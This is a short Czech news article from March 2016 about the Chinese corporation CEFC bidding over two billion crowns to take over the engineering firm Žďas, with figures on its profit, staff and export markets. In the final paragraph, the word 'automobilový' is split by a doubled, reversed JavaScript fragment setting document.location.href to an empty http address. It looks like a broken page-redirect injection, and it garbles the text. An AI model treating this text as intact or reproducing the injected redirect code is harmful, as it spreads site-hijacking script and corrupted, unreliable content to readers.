Rainbow page separator

Žďas má převzít čínská korporace CEFC

Pondělí, 14. března 2016

Žďas a.s. Žďár nad Sázavou

Žďár nad Sázavou / Žďárský podnik Žďas má brzy změnit majitele. Nejvyšší cenu za společnost nabídla šanghajská finanční a energetická korporace CEFC. Ta rozjíždí nákupy významných českých průmyslových podniků, přičemž první koupí bude právě žďárská strojírenská společnost Žďas s tradicí od roku 1951. V roce 2014 měla CEFC obrat 35 miliard dolarů a patří mezi největší soukromé čínské společnosti.
Majitel Žďasu, slovenský podnikatel Vladimír Soták, kterému patří skupina firem Železiarne Podbrezová, dostal podle Hospodářských novin nabídku převyšující dvě miliardy korun. Žďas koupil podnikatel v roce 2002 a udělal z něj prosperující podnik. Podle poslední zveřejněné výroční zprávy za rok 2014 měly strojírny provozní zisk EBITDA výnos před odečtením úroků, daní, odpisů a amortizace 303 milionů korun.
Žďárská společnost v současné době zaměstnává kolem 2500 lidí, zaměřuje na výrobu tvářecích strojů, kovacích lisů, zařízení na zpracování šrotu, ale i odlitků, ingotů a nástrojů, zejména pro au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilový průmysl. Mezi nejvýznamnější zahraniční odběratele patří Německo, Slovensko, Francie, Itálie, Rumunsko, Izrael, Rusko, Čína, Indie či Japonsko.